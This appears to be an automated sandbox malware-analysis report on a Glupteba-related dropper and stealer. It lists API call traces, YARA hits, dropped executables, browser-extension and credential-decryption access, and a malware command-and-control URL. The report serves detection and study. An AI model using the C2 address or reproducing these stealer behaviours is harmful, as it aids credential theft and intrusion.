                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,17_2_6A3B6C80
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A50A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,17_2_6A50A9A0

                        Bitcoin Miner

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 42.3.23jzBT2gZ2W4aFsNb8WtTEfu.exe.3760000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.2e70e67.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.2e40e67.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                        Compliance

                        barindex
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeUnpacked PE file: 16.2.weblinkanalyzer.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 17.2.syncUpd.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeUnpacked PE file: 21.2.weblinkanalyzer.exe.400000.0.unpack
                        Source: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exeUnpacked PE file: 35.2.f68SQOWBvY0lqnWRcqakARDI.exe.400000.3.unpack
                        Source: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exeUnpacked PE file: 42.2.23jzBT2gZ2W4aFsNb8WtTEfu.exe.400000.3.unpack
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112746972.log
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112756158.log
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112813759.log
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112809817.log
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: _assembly\GAC_MSC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb2 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb@ source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
                        Source: Binary string: symbols\dll\System.Windows.Forms.pdb1 source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .pdb[ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: HC:\Windows\System.Windows.Forms.pdbZ source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: `K_lib.dll.pdb@+ source: InstallUtil.exe, 00000008.00000002.3203681582.0000000003405000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003258000.00000004.00000800.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: .exe.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: nss3.pdb source: syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmp
                        Source: Binary string: indows.Forms.pdb source: file.exe, 00000000.00000002.3307569217.0000005F1E3F1000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: syncUpd.exe, 00000011.00000002.3320273607.000000006A41D000.00000002.00000001.01000000.00000035.sdmp
                        Source: Binary string: .exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000000.2091010792.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3206534159.0000000003620000.00000002.00000001.00040000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000000.2104454258.0000000000A57000.00000080.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000000.2114328465.0000000000FD7000.00000080.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.00000000007F1000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000D71000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp
                        Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00452A60 FindFirstFileA,GetLastError,14_2_00452A60
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,14_2_00474F88
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,14_2_004980A4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00464158
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00462750 FindFirstFileA,FindNextFileA,FindClose,14_2_00462750
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,14_2_00463CDC
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_00408123 FindFirstFileA,FindClose,15_2_00408123
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,15_2_004085B8
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_0040342B FindFirstFileA,15_2_0040342B
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040D1C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_004015C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,17_2_00411650
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B610
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,17_2_0040DB60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040D540
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00412570
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,17_2_004121F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00411B80
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                        Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                        Creates HTML files with .exe extension (expired dropper behavior)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: kWI9BKuDjwJM7B5NwPk2GzgD.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: yHair8bv0ERaBzH37z6LxL50.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: hi1kLmvmLjmGV9XJZsoarSnr.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Etx5NisO4KYhtbTdXifIEiTV.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: oCvcL0BwU8vcPCyx5xUoBc3Y.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Q5osSFe33QJNDi4fWnRX1Cu5.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: LDXcH6E4Iv1SvrK1qy7oaACH.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JyXCMCM3VWqxCiPqkfVD2gjF.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: IFLjUteLBPHHPHAOdnwBobA2.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: faO2uzdAaG1P228qHtBBLcZH.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: IDRlhwzDAGIqqRkTqqEJkpgx.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: d5GRgSmaPslr3qxE59r0Grrj.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: nDBv07hvNgThXuSIOCMDoi6m.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: bzkeEcACtFKnoC1UuUSbz0OB.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: EHUfUZeP6l6RDehwxBVxTksR.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: mK4pc1xdYC3P6I8kvaRZLGvq.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: elGBoM2ZtmiQCRbm3vEB3XLV.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Bm6HEFHdCdk8uoOOXBbmJVrU.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: nWcMFhZp4lePMF3ffEzam0Hv.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 7nBui7yHWFndJbxXyvMi3Z9f.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 9ufe1gHGCTbQcgch0LWJNHFl.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: QcjHEdeing2ZjhaateNUIVJK.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: X6qGra5pvE95uBRXRIElCuiP.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Za9YgbYvsobCQHROGG56LpJy.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 8T7EILlANzGG35y6DwATJf1o.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: HowZQITuQLqErBUo8GovFg55.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ynI9MlCoK2uCu7iRPFKyVbhb.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Kf7ZRC03XR3hUBUOYNNrjsG6.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: jum4cD5QgYDb9AipfhKNG4uj.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: UrMbnkRSiaiIW6eQOwnDTcSo.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: N4cHwiWoADLxP3cQz6IdXrkI.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 30eZAb709eOPYHi1pUuH6yc8.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: w7kTeDSEYgZDSay4L4Z7jFpu.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ozEb1N3TXSloIMlhTM4yt8ow.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 4VMsRle8WT7FgN9W5d7QyVrl.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: pxXbxOFPbFSHTNbciHYCsLtx.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: RhCJ7zqdEkZwplwZgL94yxW8.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 0DNcwfMmaLL5AZJSs5jeKfoN.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: tKpgp0xloJROxnLAtc6q8Ekw.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 1dfGghJ524gIW94KtQLvfTV8.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: bl0crpfxei2USVRb4JVAGKoa.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: N7Z4zCqKy1jgGt5mkoShe6Ob.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: YzSGwaBQ7ZU79ky8T1dwbAXw.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: CqL3N2xVZA8vxyMunrv6GPqe.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: NAHYKKwmljWteoQSQ7emQ5vj.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: bcqIuDOSPixjTDgIiitx8Dh0.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 0Qv6VcY5q9X7HaSkkLJaOzxN.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 8DcYrQ7Qs7gAyUwMnfEbRzEO.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: VMOLwRqqIQXTJzWKrLXkyRQ8.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: RTFxFt6JQGyMVAVqY4EGgVDP.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: hzHzTX1CdbMatT4xf06rKLTW.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 1eV0XoO6QzdRJm5TyvVk8jeY.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 94MOPbtk8fV3QmrVJFZPX8uo.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: lHWVZ14Acip61gtS1ac6qdAS.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: VQkEy4WzpKPECwgnQtVBm3BT.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 3zp6I9qcPQoF3702aI78wXVa.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: f3jz5WVmWaBPPPREHO52FM3n.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: y1OQjizYLY0idBJNP5yc6xcU.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Wn5MmYgTA6wlm7VHOxRNs7K1.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: hHAgXlOl44R75PdcNtQ5s8e3.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: gxzwlUCvc5fJHx9HWi3ALHoN.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: r8wSfrwRonA2pFCIACMhGo0V.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: hENo1ISjmGxBmYdjIWbQlBRD.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: qfp0lXmf35DYe7EpAYkTc2V7.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: PzCupEMyKrtWWNlNl9qKiKKA.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: wXxranKwriDbPr8wnfU8IA5G.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JuskGZco4xffB5CawcWIcxFf.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: dktGLblVpMTSWFe30FjOtUs9.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: odf651VwbqGdAI7l9jeEvh7I.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: kp2OCJt3hMg8nOfiV855IC6b.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: v3pOpcQisbkFXNHKioMsn5av.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 77pRyJyaqlt2sZMToC1r94jB.exe.8.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: fnKomgqhEl3jQ0OfLzCfcoX2.exe.8.dr
